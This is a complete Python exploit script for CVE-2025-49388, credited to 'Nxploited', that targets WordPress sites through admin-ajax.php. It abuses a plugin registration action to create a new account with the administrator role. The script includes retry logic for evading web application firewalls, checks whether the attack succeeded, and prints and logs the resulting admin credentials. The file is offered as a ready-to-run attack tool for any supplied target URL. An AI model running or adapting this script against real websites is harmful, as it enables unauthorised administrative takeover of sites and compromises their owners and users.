#!/usr/bin/env python3 # -*- coding: utf-8 -*- # By Khaled ALenazi ( Nxploited ) # Requires: requests, colorama # Install: pip install requests colorama import sys if sys.version_info[0] < 3: print("This script requires Python 3.x!") sys.exit(1) try: from colorama import Fore, Style, init init(autoreset=True) except ImportError: class Dummy: RESET = RED = GREEN = YELLOW = CYAN = '' Fore = Style = Dummy() import argparse import requests import random import string import time import urllib3 import socket import re urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def Nxploited_generate_headers(): agents = [ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Nxploited", "Mozilla/5.0 (X11; Linux x86_64) Nxploited", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Nxploited", "Nxploited/1.0 (compatible;)", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Nxploited" ] cookies = f"NxploitedID={Nxploited_random_string(16)}" return { "User-Agent": random.choice(agents), "Accept": "*/*", "Connection": "close", "Referer": "https://google.com/Nxploited", "X-Requested-With": "XMLHttpRequest", "Nxploited-By": "Nxploited", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Cookie": cookies, "Cache-Control": "no-cache", "Pragma": "no-cache", "Upgrade-Insecure-Requests": "1", "Origin": "Nxploited" } def Nxploited_random_string(length=8): chars = string.ascii_letters + string.digits return ''.join(random.choice(chars) for _ in range(length)) def Nxploited_build_payload(username, full_name, useremail, password): return { "action": "miraculous_user_register_form", "username": username, "full_name": full_name, "useremail": useremail, "password": password, "confirmpass": password, "roleusers": "administrator" } def Nxploited_extract_host_port(url): host_port = url.split("/")[2] # IPv6 if host_port.startswith("["): match = re.match(r"^\[([^\]]+)\](?::(\d+))?$", host_port) if match: host = match.group(1) port = int(match.group(2)) if match.group(2) else (443 if url.startswith("https") else 80) else: host = host_port port = 443 if url.startswith("https") else 80 elif ":" in host_port: host, port = host_port.rsplit(":", 1) try: port = int(port) except ValueError: port = 443 if url.startswith("https") else 80 else: host = host_port port = 443 if url.startswith("https") else 80 return host, port def Nxploited_check_network(host, port=80, timeout=5): try: socket.setdefaulttimeout(timeout) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.close() return True except Exception: return False def Nxploited_safe_request(url, data, headers, retries=5, timeout=12): for attempt in range(retries): try: session = requests.Session() session.max_redirects = 10 resp = session.post( url, data=data, headers=headers, timeout=timeout, verify=False, allow_redirects=True ) if resp.status_code in [403, 406, 429]: Nxploited_print_status(f"Possible WAF detected (HTTP {resp.status_code}), attempt bypass...", warn=True) headers["Nxploited-Bypass"] = Nxploited_random_string(12) time.sleep(1) continue return resp except requests.exceptions.TooManyRedirects: Nxploited_print_status("Too many redirects, retrying with new session.", warn=True) continue except requests.exceptions.Timeout: Nxploited_print_status("Timeout, increasing wait and retrying.", warn=True) time.sleep(3 + attempt) continue except requests.exceptions.RequestException as e: Nxploited_print_status(f"Attempt {attempt+1}: {str(e)}", warn=True) time.sleep(2 + attempt) Nxploited_print_status("All connection attempts failed.", error=True) sys.exit(1) def Nxploited_print_status(msg, success=False, warn=False, error=False): prefix = "[Nxploited INFO]" color = Fore.WHITE if success: prefix = "[Nxploited SUCCESS]" color = Fore.GREEN elif warn: prefix = "[Nxploited WARNING]" color = Fore.YELLOW elif error: prefix = "[Nxploited ERROR]" color = Fore.RED print(f"{color}{prefix} {msg}{Style.RESET_ALL}") def Nxploited_check_success(response_text): if 'You are successfully registered' in response_text: Nxploited_print_status("Exploitation succeeded! Nxploited By Nxploited", success=True) return True Nxploited_print_status("Exploit attempt failed or protection in place.", error=True) print(Fore.YELLOW + "[Nxploited DEBUG] Response Body:\n" + response_text + Style.RESET_ALL) return False def Nxploited_show_credentials(username, password, useremail): print(Fore.CYAN + "\n[Nxploited CREDENTIALS]" + Style.RESET_ALL) print(Fore.CYAN + f"Username : {username}") print(Fore.CYAN + f"Password : {password}") print(Fore.CYAN + f"Email : {useremail}" + Style.RESET_ALL) def Nxploited_log_to_file(filename, msg): try: with open(filename, "a", encoding="utf-8") as logf: logf.write(msg + "\n") except Exception: pass def Nxploited_main(): parser = argparse.ArgumentParser(description="CVE-2025-49388 (Nxploited Edition)") parser.add_argument("-u", "--url", required=True, help="Target WordPress site URL") parser.add_argument("-un", "--username", default="Nxploited_admin", help="Username to register (default: Nxploited_admin)") parser.add_argument("-fn", "--full_name", default="Nxploited", help="Full name (default: Nxploited)") parser.add_argument("-em", "--useremail", default="Nxploited@gmail.com", help="Email (default: Nxploited@gmail.com)") parser.add_argument("-pw", "--password", default="Str0ng!Pass123", help="Password (default: Str0ng!Pass123)") parser.add_argument("-o", "--output", default=None, help="Write results and log to this file") args = parser.parse_args() if not args.url.startswith("http://") and not args.url.startswith("https://"): args.url = "http://" + args.url if not args.url.startswith('http'): Nxploited_print_status("URL must start with http or https.", error=True) sys.exit(1) target = args.url.rstrip("/") + "/wp-admin/admin-ajax.php" host, port = Nxploited_extract_host_port(args.url) if not Nxploited_check_network(host, port): Nxploited_print_status(f"Host not reachable ({host}:{port}). Check your network or target address.", error=True) sys.exit(1) headers = Nxploited_generate_headers() data = Nxploited_build_payload(args.username, args.full_name, args.useremail, args.password) Nxploited_print_status(f"Target: {target}") Nxploited_print_status("Starting exploitation attempt...") response = Nxploited_safe_request(target, data, headers) if Nxploited_check_success(response.text): Nxploited_show_credentials(args.username, args.password, args.useremail) if args.output: Nxploited_log_to_file(args.output, f"[SUCCESS]\nUsername: {args.username}\nPassword: {args.password}\nEmail: {args.useremail}\n") else: Nxploited_print_status("Target might be patched, protected, or blocking requests.", warn=True) if args.output: Nxploited_log_to_file(args.output, "[FAILED] Target might be patched/protected.\n") if __name__ == "__main__": try: Nxploited_main() except Exception as ex: Nxploited_print_status(f"Unexpected error: {ex}", error=True) sys.exit(1)